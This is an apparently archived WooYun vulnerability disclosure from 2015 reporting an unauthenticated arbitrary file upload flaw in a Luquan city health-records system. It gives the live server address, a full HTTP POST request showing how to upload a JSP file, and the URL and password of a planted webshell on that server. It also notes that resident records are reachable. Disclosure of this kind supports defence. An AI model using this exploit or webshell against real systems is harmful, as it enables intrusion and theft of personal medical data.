当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109803

漏洞标题:鹿泉市某管理系统存在任意文件上传漏洞

相关厂商:鹿泉市卫生局

漏洞作者: 路人甲

提交时间:2015-05-01 07:18

修复时间:2015-06-19 13:52

公开时间:2015-06-19 13:52

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-01: 细节已通知厂商并且等待厂商处理中
2015-05-05: 厂商已经确认,细节仅向厂商公开
2015-05-15: 细节向核心白帽子及相关领域专家公开
2015-05-25: 细节向普通白帽子公开
2015-06-04: 细节向实习白帽子公开
2015-06-19: 细节向公众公开

简要描述:

上传页面未授权访问导致任意文件上传漏洞

详细说明:

目标地址:
鹿泉市健康档案信息管理系统
http://61.182.231.214:8080/AHIS/Login/

QQ截图20150422232312.jpg


上传页面地址:http://61.182.231.214:8080/AHIS/PubFrame/UpFile.jsp

QQ截图20150422232446.jpg


漏洞证明:

上传后抓包

QQ截图20150422232546.jpg


上传路径为:
LOCALSOURCE/PhotoGraph/201504221125274.jpg
POC,通过修改fname=jsp,即可达到上传jsp的目的

POST http://61.182.231.214:8080/AHIS/PubFrame/UpFile.jsp?ImportUrl=true&fname=jsp&filename=null HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://61.182.231.214:8080/AHIS/PubFrame/UpFile.jsp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: multipart/form-data; boundary=---------------------------7df14c216504c4
Accept-Encoding: gzip, deflate
Host: 61.182.231.214:8080
Content-Length: 215
Connection: Keep-Alive
Pragma: no-cache
Cookie: JSESSIONID=D88D7D347CE50DA9C73B7C0FC43E2514
-----------------------------7df14c216504c4
Content-Disposition: form-data; name="UpPhotoGraph"; filename="160_default.jpg"
Content-Type: image/pjpeg
wooyun test
-----------------------------7df14c216504c4--


QQ截图20150422232738.jpg


一句话地址:http://61.182.231.214:8080/LOCALSOURCE/PhotoGraph/20150422114934.jsp
密码:woo0yun

QQ截图20150422232958.jpg


QQ截图20150422233032.jpg


QQ截图20150422233048.jpg


居民数据量还算可观

修复方案:

权限控制,上传点过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-05-05 13:50

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给河北分中心,由河北分中心后续协调网站管理单位处置。

最新状态:

暂无